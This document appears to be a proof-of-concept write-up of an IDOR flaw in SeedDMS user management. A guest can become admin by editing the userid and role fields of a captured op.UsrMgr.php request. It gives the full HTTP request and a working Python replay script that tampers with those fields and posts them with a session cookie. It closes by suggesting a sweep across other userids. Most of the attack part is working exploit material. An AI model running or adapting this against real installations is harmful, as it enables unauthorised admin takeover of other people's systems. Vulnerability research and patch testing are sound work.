Insecure Direct Object Reference (IDOR) is a type of access control vulnerability that occurs when an application allows users to access or modify objects by directly manipulating identifiers, such as URLs or parameters, without proper authorization checks. This vulnerability can lead to unauthorized access to sensitive data or functionality, often resulting in horizontal or vertical privilege escalation.
This IDOR vulnerability allows a Guest user to upgrade their permissions to those of an Admin by changing the userid and role parameters in the user-edit request.
Create two users, sunil and aman, at the endpoint: http://localhost/seeddms/out/out.UsrMgr.php


Check the list of users at http://localhost/seeddms/out/out.UserList.php

In our case, the userid of aman is 5 and the userid of sunil is 6. (This can be checked by hovering over or clicking the Edit button; the userid appears in the URL.)

Go to http://localhost/seeddms/out/out.UsrMgr.php?userid=5 and change the Role to Guest. (Adjust the userid parameter in the URL to match the IDs of your own users.)
Capture the request in Burp Suite (or OWASP ZAP) as you click the Save button.
You will get a request like this (the userid and role parts are the two we will modify):
POST /seeddms/op/op.UsrMgr.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------113135331919090313053417803191
Content-Length: 1743
Origin: http://localhost
Connection: close
Referer: http://localhost/seeddms/out/out.UsrMgr.php?userid=5
Cookie: mydms_session=143fc0cdf34a682256baae37abda8ce2
Upgrade-Insecure-Requests: 1

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="formtoken"

519192f812db211d797f140b67255d03
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="userid"

5
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="action"

edituser
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="login"

aman
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwd"

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdconf"

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdexpiration"

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="name"

Aman User
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="comment"

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="role"

2
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="homefolder"

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="targetname13e65f6ab355d3a32705b2e99987d414"

-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="quota"

0
-----------------------------113135331919090313053417803191--
Change userid from 5 to 6 and role from 2 to 1. This retargets the edit from Aman to Sunil and changes the assigned role from Guest (2) to Admin (1); nothing else in the request, including the formtoken and session cookie, needs to change.
Now forward the request and switch off the proxy.
You'll get an output like this in the web browser:

This shows that instead of Aman (userid=5), the details of Sunil (userid=6) were updated, and Sunil's role was set to Admin instead of Guest. op.UsrMgr.php acts on whatever userid and role values arrive in the form body: neither the session nor the formtoken binds the edit to the user the form was originally loaded for, which is the direct object reference being abused.
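To make the replay repeatable (for example to re-test after a fix, or to try every userid rather than one), the manual Burp edit can be scripted. The following is an added example, not code from the writeup or from SeedDMS: it rebuilds the captured multipart body, rewrites only the userid and role parts, and posts the result with the captured session cookie. The boundary, field names and field values are those of the capture above; the host, path, cookie, the email placeholder as rendered on the page, and the expectation that a patched server ignores the submitted userid are assumptions.

```python
"""Replay the captured op.UsrMgr.php request with tampered userid/role fields.

Added example; not part of the original writeup or of SeedDMS. Boundary, field
names and values are copied from the captured request. Host, path, cookie and
the behaviour of a patched server are assumptions for a local test instance.
"""
import http.client
import re
from typing import Dict, List, Tuple

Fields = List[Tuple[str, str]]

# Boundary exactly as it appears in the captured Content-Type header.
BOUNDARY = "---------------------------113135331919090313053417803191"

# Constructed from the captured body: same fields, same order, same values.
# The formtoken is the captured one; SeedDMS issues these per form, so take
# the value from your own capture when running this against a live instance.
CAPTURED_FIELDS: Fields = [
    ("formtoken", "519192f812db211d797f140b67255d03"),
    ("userid", "5"),
    ("action", "edituser"),
    ("login", "aman"),
    ("pwd", ""),
    ("pwdconf", ""),
    ("pwdexpiration", ""),
    ("name", "Aman User"),
    ("email", "[email protected]"),  # value as rendered in the writeup
    ("comment", ""),
    ("role", "2"),
    ("homefolder", ""),
    ("targetname13e65f6ab355d3a32705b2e99987d414", ""),
    ("quota", "0"),
]


def build_multipart(fields: Fields, boundary: str) -> str:
    """Serialise (name, value) pairs as a multipart/form-data body with CRLF line ends."""
    out = []
    for name, value in fields:
        out.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n'
            "\r\n"
            f"{value}\r\n"
        )
    out.append(f"--{boundary}--\r\n")
    return "".join(out)


def parse_multipart(body: str, boundary: str) -> Fields:
    """Inverse of build_multipart: recover (name, value) pairs in their original order.

    Only plain text parts with a name= attribute are handled, which is all this form uses.
    """
    fields: Fields = []
    for chunk in body.split(f"--{boundary}"):
        # Each part is "\r\n<headers>\r\n\r\n<value>\r\n"; the preamble is empty
        # and the closing delimiter leaves a bare "--\r\n" behind.
        if chunk.startswith("\r\n"):
            chunk = chunk[2:]
        if chunk.endswith("\r\n"):
            chunk = chunk[:-2]
        if chunk in ("", "--"):
            continue
        headers, _, value = chunk.partition("\r\n\r\n")
        match = re.search(r'\bname="([^"]*)"', headers)
        if match is None:
            raise ValueError(f"multipart part without a name: {headers!r}")
        fields.append((match.group(1), value))
    return fields


def tamper_multipart(body: str, boundary: str, overrides: Dict[str, str]) -> str:
    """Return body with the given fields replaced; every other part is left byte-for-byte.

    Refuses to add fields that were not in the capture, so a typo in a field name
    surfaces as an error instead of a silently unchanged replay.
    """
    fields = parse_multipart(body, boundary)
    present = {name for name, _ in fields}
    unknown = set(overrides) - present
    if unknown:
        raise KeyError(f"fields not present in captured body: {sorted(unknown)}")
    return build_multipart(
        [(name, overrides.get(name, value)) for name, value in fields], boundary
    )


def replay(host: str, path: str, cookie: str, body: str, boundary: str) -> Tuple[int, str]:
    """POST the (tampered) body with the captured session cookie; return (status, html).

    Network step, not exercised offline. http.client adds Content-Length itself.
    """
    conn = http.client.HTTPConnection(host, timeout=10)
    try:
        conn.request(
            "POST",
            path,
            body=body.encode("utf-8"),
            headers={
                "Content-Type": f"multipart/form-data; boundary={boundary}",
                "Cookie": cookie,
                "Referer": f"http://{host}/seeddms/out/out.UsrMgr.php?userid=5",
            },
        )
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


if __name__ == "__main__":
    captured = build_multipart(CAPTURED_FIELDS, BOUNDARY)
    # Same change as the manual Burp edit: target Sunil (6) and make him Admin (1).
    tampered = tamper_multipart(captured, BOUNDARY, {"userid": "6", "role": "1"})
    status, _html = replay("localhost", "/seeddms/op/op.UsrMgr.php",
                           "mydms_session=143fc0cdf34a682256baae37abda8ce2",
                           tampered, BOUNDARY)
    print(status)
    # A patched server should reject the edit or ignore the submitted userid.
    # Confirm by reloading out.UserList.php rather than trusting the status alone.
```

Run it against the test instance with the cookie and formtoken from your own capture; to sweep for other reachable accounts, call tamper_multipart once per candidate userid and compare the user list before and after each replay.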